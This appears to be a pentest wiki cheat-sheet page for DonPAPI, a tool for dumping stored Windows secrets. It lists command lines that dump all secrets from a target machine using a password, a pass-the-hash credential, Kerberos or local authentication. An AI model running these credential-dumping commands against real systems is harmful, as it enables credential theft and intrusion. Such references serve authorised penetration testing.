> For the complete documentation index, see [llms.txt](https://notes.brinkles.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.brinkles.wiki/tools/internal-tools/donpapi.md).

# DonPAPI

{% embed url="<https://github.com/login-securite/DonPAPI>" %}

## Dumps all secrets of the Target Machine with an Admin Account

$ DonPAPI.py domain/user:passw0rd\@target

## Using the User's hash

$ DonPAPI.py --hashes : domain/user\@target

## Using Kerberos (-k) and local auth (-local\_auth)

$ DonPAPI.py -k domain/user\@target

$ DonPAPI.py -local\_auth user\@target
